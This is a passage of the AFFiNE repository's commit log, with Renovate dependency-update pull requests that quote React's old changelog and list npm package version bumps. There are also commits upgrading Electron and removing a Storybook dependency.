- React uses `console.error` instead of `console.warn` for warnings so that browsers show a full stack trace in the console. (Our warnings appear when you use patterns that will break in future releases and for code that is likely to behave unexpectedly, so we do consider our warnings to be “must-fix” errors.)
- Previously, including untrusted objects as React children [could result in an XSS security vulnerability](http://danlec.com/blog/xss-via-a-spoofed-react-element ). This problem should be avoided by properly validating input at the application layer and by never passing untrusted objects around your application code. As an additional layer of protection, [React now tags elements](https://togithub.com/facebook/react/pull/4832 ) with a specific [ES2015 (ES6) `Symbol`](http://www.2ality.com/2014/12/es6-symbols.html ) in browsers that support it, in order to ensure that React never considers untrusted JSON to be a valid element. If this extra security protection is important to you, you should add a `Symbol` polyfill for older browsers, such as the one included by [Babel’s polyfill](https://babeljs.io/docs/usage/polyfill/ ).
- When possible, React DOM now generates XHTML-compatible markup.
- React DOM now supports these standard HTML attributes: `capture`, `challenge`, `inputMode`, `is`, `keyParams`, `keyType`, `minLength`, `summary`, `wrap`. It also now supports these non-standard attributes: `autoSave`, `results`, `security`.
- React DOM now supports these SVG attributes, which render into namespaced attributes: `xlinkActuate`, `xlinkArcrole`, `xlinkHref`, `xlinkRole`, `xlinkShow`, `xlinkTitle`, `xlinkType`, `xmlBase`, `xmlLang`, `xmlSpace`.
- The `image` SVG tag is now supported by React DOM.
- In React DOM, arbitrary attributes are supported on custom elements (those with a hyphen in the tag name or an `is="..."` attribute).
- React DOM now supports these media events on `audio` and `video` tags: `onAbort`, `onCanPlay`, `onCanPlayThrough`, `onDurationChange`, `onEmptied`, `onEncrypted`, `onEnded`, `onError`, `onLoadedData`, `onLoadedMetadata`, `onLoadStart`, `onPause`, `onPlay`, `onPlaying`, `onProgress`, `onRateChange`, `onSeeked`, `onSeeking`, `onStalled`, `onSuspend`, `onTimeUpdate`, `onVolumeChange`, `onWaiting`.
- Many small performance improvements have been made.
- Many warnings show more context than before.
- Add-Ons: A [`shallowCompare`](https://togithub.com/facebook/react/pull/3355 ) add-on has been added as a migration path for `PureRenderMixin` in ES6 classes.
- Add-Ons: `CSSTransitionGroup` can now use [custom class names](https://togithub.com/facebook/react/blob/48942b85/docs/docs/10.1-animation.md#custom-classes ) instead of appending `-enter-active` or similar to the transition name.
##### New helpful warnings
- React DOM now warns you when nesting HTML elements invalidly, which helps you avoid surprising errors during updates.
- Passing `document.body` directly as the container to `ReactDOM.render` now gives a warning as doing so can cause problems with browser extensions that modify the DOM.
- Using multiple instances of React together is not supported, so we now warn when we detect this case to help you avoid running into the resulting problems.
##### Notable bug fixes
- Click events are handled by React DOM more reliably in mobile browsers, particularly in Mobile Safari.
- SVG elements are created with the correct namespace in more cases.
- React DOM now renders `<option>` elements with multiple text children properly and renders `<select>` elements on the server with the correct option selected.
- When two separate copies of React add nodes to the same document (including when a browser extension uses React), React DOM tries harder not to throw exceptions during event handling.
- Using non-lowercase HTML tag names in React DOM (e.g., `React.createElement('DIV')`) no longer causes problems, though we continue to recommend lowercase for consistency with the JSX tag name convention (lowercase names refer to built-in components, capitalized names refer to custom components).
- React DOM understands that these CSS properties are unitless and does not append “px” to their values: `animationIterationCount`, `boxOrdinalGroup`, `flexOrder`, `tabSize`, `stopOpacity`.
- Add-Ons: When using the test utils, `Simulate.mouseEnter` and `Simulate.mouseLeave` now work.
- Add-Ons: ReactTransitionGroup now correctly handles multiple nodes being removed simultaneously.
##### React Tools / Babel
##### Breaking Changes
- The `react-tools` package and `JSXTransformer.js` browser file [have been deprecated](https://reactjs.org/blog/2015/06/12/deprecating-jstransform-and-react-tools.html ). You can continue using version `0.13.3` of both, but we no longer support them and recommend migrating to [Babel](https://babeljs.io ), which has built-in support for React and JSX.
##### New Features
- Babel 5.8.24 introduces **Inlining React elements:** The `optimisation.react.inlineElements` transform converts JSX elements to object literals like `{type: 'div', props: ...}` instead of calls to `React.createElement`. This should only be enabled in production, since it disables some development warnings/checks.
- Babel 5.8.24 introduces **Constant hoisting for React elements:** The `optimisation.react.constantElements` transform hoists element creation to the top level for subtrees that are fully static, which reduces calls to `React.createElement` and the resulting allocations. More importantly, it tells React that the subtree hasn’t changed so React can completely skip it when reconciling. This should only be enabled in production, since it disables some development warnings/checks.
### [`v0.13.0`](https://togithub.com/facebook/react/blob/HEAD/CHANGELOG.md#0130-March-10-2015 )
[Compare Source](https://togithub.com/facebook/react/compare/v0.12.0...v0.13.0 )
##### React Core
##### Breaking Changes
- Deprecated patterns that warned in 0.12 no longer work: most prominently, calling component classes without using JSX or React.createElement and using non-component functions with JSX or createElement
- Mutating `props` after an element is created is deprecated and will cause warnings in development mode; future versions of React will incorporate performance optimizations assuming that props aren't mutated
- Static methods (defined in `statics`) are no longer autobound to the component class
- `ref` resolution order has changed slightly such that a ref to a component is available immediately after its `componentDidMount` method is called; this change should be observable only if your component calls a parent component's callback within your `componentDidMount`, which is an anti-pattern and should be avoided regardless
- Calls to `setState` in life-cycle methods are now always batched and therefore asynchronous. Previously the first call on the first mount was synchronous.
- `setState` and `forceUpdate` on an unmounted component now warns instead of throwing. That avoids a possible race condition with Promises.
- Access to most internal properties has been completely removed, including `this._pendingState` and `this._rootNodeID`.
##### New Features
- Support for using ES6 classes to build React components; see the [v0.13.0 beta 1 notes](https://reactjs.org/blog/2015/01/27/react-v0.13.0-beta-1.html ) for details.
- Added new top-level API `React.findDOMNode(component)`, which should be used in place of `component.getDOMNode()`. The base class for ES6-based components will not have `getDOMNode`. This change will enable some more patterns moving forward.
- Added a new top-level API `React.cloneElement(el, props)` for making copies of React elements – see the [v0.13 RC2 notes](https://reactjs.org/blog/2015/03/03/react-v0.13-rc2.html#react.cloneelement ) for more details.
- New `ref` style, allowing a callback to be used in place of a name: `<Photo ref={(c) => this._photo = c} />` allows you to reference the component with `this._photo` (as opposed to `ref="photo"` which gives `this.refs.photo`).
- `this.setState()` can now take a function as the first argument for transactional state updates, such as `this.setState((state, props) => ({count: state.count + 1}));` – this means that you no longer need to use `this._pendingState`, which is now gone.
- Support for iterators and immutable-js sequences as children.
##### Deprecations
- `ComponentClass.type` is deprecated. Just use `ComponentClass` (usually as `element.type === ComponentClass`).
- Some methods that are available on `createClass`-based components are removed or deprecated from ES6 classes (`getDOMNode`, `replaceState`, `isMounted`, `setProps`, `replaceProps`).
##### React with Add-Ons
##### New Features
- [`React.addons.createFragment` was added](https://reactjs.org/docs/create-fragment.html ) for adding keys to entire sets of children.
##### Deprecations
- `React.addons.classSet` is now deprecated. This functionality can be replaced with several freely available modules. [classnames](https://www.npmjs.com/package/classnames ) is one such module.
- Calls to `React.addons.cloneWithProps` can be migrated to use `React.cloneElement` instead – make sure to merge `style` and `className` manually if desired.
##### React Tools
##### Breaking Changes
- When transforming ES6 syntax, `class` methods are no longer enumerable by default, which requires `Object.defineProperty`; if you support browsers such as IE8, you can pass `--target es3` to mirror the old behavior
##### New Features
- `--target` option is available on the jsx command, allowing users to specify and ECMAScript version to target.
- `es5` is the default.
- `es3` restores the previous default behavior. An additional transform is added here to ensure the use of reserved words as properties is safe (eg `this.static` will become `this['static']` for IE8 compatibility).
- The transform for the call spread operator has also been enabled.
##### JSXTransformer
##### Breaking Changes
- The return value of `transform` now contains `sourceMap` as a JS object already, not an instance of `SourceMapGenerator`.
##### JSX
##### Breaking Changes
- A change was made to how some JSX was parsed, specifically around the use of `>` or `}` when inside an element. Previously it would be treated as a string but now it will be treated as a parse error. The [`jsx_orphaned_brackets_transformer`](https://www.npmjs.com/package/jsx_orphaned_brackets_transformer ) package on npm can be used to find and fix potential issues in your JSX code.
### [`v0.12.0`](https://togithub.com/facebook/react/blob/HEAD/CHANGELOG.md#0120-October-28-2014 )
[Compare Source](https://togithub.com/facebook/react/compare/v0.11.0...v0.12.0 )
##### React Core
##### Breaking Changes
- `key` and `ref` moved off props object, now
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yNi4xIiwidXBkYXRlZEluVmVyIjoiMzguMjYuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-08-19 18:34:45 +00:00
pengx17
9d42db56ca
chore: bump electron version ( #7922 )
2024-08-19 14:24:34 +00:00
pengx17
f3930a9262
chore(core): remove @storybook/test dep ( #7923 )
...
we no longer need "@storybook/test" and it indirectly has an incompatible prettier version 3.3.2 which differs from what we are using "3.3.3".
removing it to resolve this issue
2024-08-19 13:50:06 +00:00
renovate
10bea3922e
chore: bump up all non-major dependencies ( #7615 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence | Type | Update |
|---|---|---|---|---|---|---|---|
| [@apollo/server](https://togithub.com/apollographql/apollo-server ) ([source](https://togithub.com/apollographql/apollo-server/tree/HEAD/packages/server )) | [`4.10.5` -> `4.11.0`](https://renovatebot.com/diffs/npm/@apollo%2fserver/4.10.5/4.11.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@atlaskit/pragmatic-drag-and-drop](https://atlassian.design/components/pragmatic-drag-and-drop/ ) ([source](https://togithub.com/atlassian/pragmatic-drag-and-drop )) | [`1.2.1` -> `1.3.0`](https://renovatebot.com/diffs/npm/@atlaskit%2fpragmatic-drag-and-drop/1.2.1/1.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://togithub.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.620.0` -> `3.633.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.620.0/3.633.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://togithub.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.620.0` -> `3.633.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.620.0/3.633.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@commitlint/cli](https://commitlint.js.org/ ) ([source](https://togithub.com/conventional-changelog/commitlint/tree/HEAD/@commitlint/cli )) | [`19.3.0` -> `19.4.0`](https://renovatebot.com/diffs/npm/@commitlint%2fcli/19.3.0/19.4.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@fal-ai/serverless-client](https://togithub.com/fal-ai/fal-js ) ([source](https://togithub.com/fal-ai/fal-js/tree/HEAD/libs/client )) | [`^0.13.0` -> `^0.14.0`](https://renovatebot.com/diffs/npm/@fal-ai%2fserverless-client/0.13.0/0.14.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@floating-ui/dom](https://floating-ui.com ) ([source](https://togithub.com/floating-ui/floating-ui/tree/HEAD/packages/dom )) | [`1.6.8` -> `1.6.10`](https://renovatebot.com/diffs/npm/@floating-ui%2fdom/1.6.8/1.6.10 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@napi-rs/cli](https://togithub.com/napi-rs/napi-rs ) | [`3.0.0-alpha.60` -> `3.0.0-alpha.62`](https://renovatebot.com/diffs/npm/@napi-rs%2fcli/3.0.0-alpha.60/3.0.0-alpha.62 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@nestjs/common](https://nestjs.com ) ([source](https://togithub.com/nestjs/nest/tree/HEAD/packages/common )) | [`10.3.10` -> `10.4.1`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/10.3.10/10.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@nestjs/core](https://nestjs.com ) ([source](https://togithub.com/nestjs/nest/tree/HEAD/packages/core )) | [`10.3.10` -> `10.4.1`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/10.3.10/10.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@nestjs/platform-express](https://nestjs.com ) ([source](https://togithub.com/nestjs/nest/tree/HEAD/packages/platform-express )) | [`10.3.10` -> `10.4.1`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/10.3.10/10.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@nestjs/platform-socket.io](https://nestjs.com ) ([source](https://togithub.com/nestjs/nest/tree/HEAD/packages/platform-socket.io )) | [`10.3.10` -> `10.4.1`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/10.3.10/10.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@nestjs/testing](https://nestjs.com ) ([source](https://togithub.com/nestjs/nest/tree/HEAD/packages/testing )) | [`10.3.10` -> `10.4.1`](https://renovatebot.com/diffs/npm/@nestjs%2ftesting/10.3.10/10.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@nestjs/websockets](https://togithub.com/nestjs/nest ) ([source](https://togithub.com/nestjs/nest/tree/HEAD/packages/websockets )) | [`10.3.10` -> `10.4.1`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/10.3.10/10.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@nx/vite](https://nx.dev ) ([source](https://togithub.com/nrwl/nx/tree/HEAD/packages/vite )) | [`19.5.3` -> `19.6.0`](https://renovatebot.com/diffs/npm/@nx%2fvite/19.5.3/19.6.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@playwright/test](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`=1.44.1` -> `=1.46.1`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.44.1/1.46.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@prisma/client](https://www.prisma.io ) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/client )) | [`5.17.0` -> `5.18.0`](https://renovatebot.com/diffs/npm/@prisma%2fclient/5.17.0/5.18.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@prisma/instrumentation](https://www.prisma.io ) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/instrumentation )) | [`5.17.0` -> `5.18.0`](https://renovatebot.com/diffs/npm/@prisma%2finstrumentation/5.17.0/5.18.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@sentry/esbuild-plugin](https://togithub.com/getsentry/sentry-javascript-bundler-plugins/tree/main/packages/esbuild-plugin ) ([source](https://togithub.com/getsentry/sentry-javascript-bundler-plugins )) | [`2.21.1` -> `2.22.2`](https://renovatebot.com/diffs/npm/@sentry%2fesbuild-plugin/2.21.1/2.22.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@sentry/integrations](https://togithub.com/getsentry/sentry-javascript/tree/master/packages/integrations ) ([source](https://togithub.com/getsentry/sentry-javascript )) | [`7.118.0` -> `7.119.0`](https://renovatebot.com/diffs/npm/@sentry%2fintegrations/7.118.0/7.119.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@sentry/react](https://togithub.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://togithub.com/getsentry/sentry-javascript )) | [`8.20.0` -> `8.26.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.20.0/8.26.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@sentry/react](https://togithub.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://togithub.com/getsentry/sentry-javascript )) | [`8.20.0` -> `8.26.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.20.0/8.26.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@sentry/webpack-plugin](https://togithub.com/getsentry/sentry-javascript-bundler-plugins/tree/main/packages/webpack-plugin ) ([source](https://togithub.com/getsentry/sentry-javascript-bundler-plugins )) | [`2.21.1` -> `2.22.2`](https://renovatebot.com/diffs/npm/@sentry%2fwebpack-plugin/2.21.1/2.22.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@swc/core](https://swc.rs ) ([source](https://togithub.com/swc-project/swc )) | [`1.6.13` -> `1.7.12`](https://renovatebot.com/diffs/npm/@swc%2fcore/1.6.13/1.7.12 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@tanstack/react-table](https://tanstack.com/table ) ([source](https://togithub.com/TanStack/table/tree/HEAD/packages/react-table )) | [`8.19.3` -> `8.20.1`](https://renovatebot.com/diffs/npm/@tanstack%2freact-table/8.19.3/8.20.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@toeverything/theme](https://togithub.com/toeverything/design ) | [`1.0.4` -> `1.0.5`](https://renovatebot.com/diffs/npm/@toeverything%2ftheme/1.0.4/1.0.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@types/node](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node ) ([source](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node )) | [`20.14.12` -> `20.16.1`](https://renovatebot.com/diffs/npm/@types%2fnode/20.14.12/20.16.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@types/ws](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/ws ) ([source](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/ws )) | [`8.5.11` -> `8.5.12`](https://renovatebot.com/diffs/npm/@types%2fws/8.5.11/8.5.12 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@vanilla-extract/css](https://togithub.com/vanilla-extract-css/vanilla-extract ) ([source](https://togithub.com/vanilla-extract-css/vanilla-extract/tree/HEAD/packages/css )) | [`1.15.3` -> `1.15.4`](https://renovatebot.com/diffs/npm/@vanilla-extract%2fcss/1.15.3/1.15.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@vanilla-extract/dynamic](https://togithub.com/vanilla-extract-css/vanilla-extract ) ([source](https://togithub.com/vanilla-extract-css/vanilla-extract/tree/HEAD/packages/dynamic )) | [`2.1.1` -> `2.1.2`](https://renovatebot.com/diffs/npm/@vanilla-extract%2fdynamic/2.1.1/2.1.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@vanilla-extract/vite-plugin](https://togithub.com/vanilla-extract-css/vanilla-extract ) ([source](https://togithub.com/vanilla-extract-css/vanilla-extract/tree/HEAD/packages/vite-plugin )) | [`4.0.13` -> `4.0.14`](https://renovatebot.com/diffs/npm/@vanilla-extract%2fvite-plugin/4.0.13/4.0.14 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@vanilla-extract/webpack-plugin](https://togithub.com/vanilla-extract-css/vanilla-extract ) ([source](https://togithub.com/vanilla-extract-css/vanilla-extract/tree/HEAD/packages/webpack-plugin )) | [`2.3.11` -> `2.3.12`](https://renovatebot.com/diffs/npm/@vanilla-extract%2fwebpack-plugin/2.3.11/2.3.12 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [autoprefixer](https://togithub.com/postcss/autoprefixer ) | [`10.4.19` -> `10.4.20`](https://renovatebot.com/diffs/npm/autoprefixer/10.4.19/10.4.20 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [commitlint](https://commitlint.js.org/ ) ([source](https://togithub.com/conventional-changelog/commitlint/tree/HEAD/@alias/commitlint )) | [`19.3.0` -> `19.4.0`](https://renovatebot.com/diffs/npm/commitlint/19.3.0/19.4.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [core-js](https://togithub.com/zloirock/core-js ) ([source](https://togithub.com/zloirock/core-js/tree/HEAD/packages/core-js )) | [`3.37.1` -> `3.38.0`](https://renovatebot.com/diffs/npm/core-js/3.37.1/3.38.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [core-js](https://togithub.com/zloirock/core-js ) ([source](https://togithub.com/zloirock/core-js/tree/HEAD/packages/core-js )) | [`3.37.1` -> `3.38.0`](https://renovatebot.com/diffs/npm/core-js/3.37.1/3.38.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [cssnano](https://togithub.com/cssnano/cssnano ) | [`7.0.4` -> `7.0.5`](https://renovatebot.com/diffs/npm/cssnano/7.0.4/7.0.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [electron](https://togithub.com/electron/electron ) | [`~30.2.0` -> `~30.4.0`](https://renovatebot.com/diffs/npm/electron/30.2.0/30.4.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [embla-carousel-react](https://www.embla-carousel.com ) ([source](https://togithub.com/davidjerleke/embla-carousel )) | [`8.1.7` -> `8.1.8`](https://renovatebot.com/diffs/npm/embla-carousel-react/8.1.7/8.1.8 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [esbuild](https://togithub.com/evanw/esbuild ) | [`0.23.0` -> `0.23.1`](https://renovatebot.com/diffs/npm/esbuild/0.23.0/0.23.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [file-type](https://togithub.com/sindresorhus/file-type ) | [`19.3.0` -> `19.4.1`](https://renovatebot.com/diffs/npm/file-type/19.3.0/19.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [husky](https://togithub.com/typicode/husky ) | [`9.1.2` -> `9.1.4`](https://renovatebot.com/diffs/npm/husky/9.1.2/9.1.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [i18next](https://www.i18next.com ) ([source](https://togithub.com/i18next/i18next )) | [`23.12.2` -> `23.13.0`](https://renovatebot.com/diffs/npm/i18next/23.12.2/23.13.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
